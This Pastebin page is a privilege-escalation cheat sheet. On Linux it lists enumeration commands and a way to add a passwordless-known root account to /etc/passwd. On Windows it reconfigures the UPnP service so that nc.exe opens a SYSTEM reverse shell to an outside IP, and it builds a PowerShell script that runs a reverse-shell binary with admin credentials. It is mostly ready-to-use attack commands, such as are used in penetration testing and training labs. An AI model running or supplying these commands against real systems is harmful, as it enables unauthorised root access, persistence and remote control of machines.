SHARE
TWEET

Untitled

UY-Scuti Jun 18th, 2019 119 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --- Linux ---
  2.  
  3. Website: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  4.  
  5.  
  6. Script:
  7. linuxprivchecker.py
  8.  
  9.  
  10. Checking which services are run as root:
  11. ps aux | grep root
  12.  
  13.  
  14. Checking which jobs are scheduled:
  15. ls -al /etc/cron*
  16.  
  17.  
  18. Checking world-writable files:
  19. find /etc/ -readable -type f -perm 777 2>/dev/null
  20.  
  21.  
  22. Verifying file permissions:
  23. find / -perm -u=s -type f 2>/dev/null
  24.  
  25.  
  26. Nmap interactive:
  27. sudo nmap --interactive
  28.  
  29.  
  30. Adding an alternate root account to the /etc/passwd file:
  31. perl -le 'print crypt("foo", "aa")'
  32. echo "aa:aaKNIEDOaueR6:0:0:aa:/aa:/bin/bash" >> /etc/passwd
  33.  
  34.  
  35. Switching to the alternate root account:
  36. su aa
  37. foo
  38.  
  39.  
  40. Switching to sudoer if sudoer:
  41. sudo /bin/bash
  42.  
  43.  
  44. Notes:
  45. - Check passwd file permissions, this is usually an easy way in.
  46. - Check permissions on relevant important files; this usually throws errors due to improper permissions.
  47.  
  48.  
  49.  
  50. --- Windows ---
  51.  
  52. Website: http://www.fuzzysecurity.com/tutorials/16.html
  53.  
  54.  
  55. Checking the system's users:
  56. net users
  57. net user alice
  58. net user bethany
  59.  
  60.  
  61. Checking the running processes:
  62. tasklist /SVC
  63.  
  64.  
  65. Checking service configuration for a notorious insecure service:
  66. sc qc upnphost
  67.  
  68.  
  69. Reconfiguring the UPnP Device Host service to run a binary of choosing with SYSTEM privileges, in this case, nc.exe:
  70. sc qc upnphost
  71. sc config upnphost binPath= "C:\Users\Public\nc.exe -nv 192.168.41.31 443 -e C:\Windows\System32\cmd.exe"
  72. sc config upnphost obj= ".\LocalSystem" password= ""
  73. net start upnphost
  74.  
  75.  
  76. Using Powershell to RunAs an administrative user:
  77. echo $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force > run.ps1
  78. echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
  79. echo $computer = "DANCING-PARROT" >> run.ps1
  80. echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", >> run.ps1
  81. echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
  82. powershell -ExecutionPolicy Bypass -File run.ps1
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top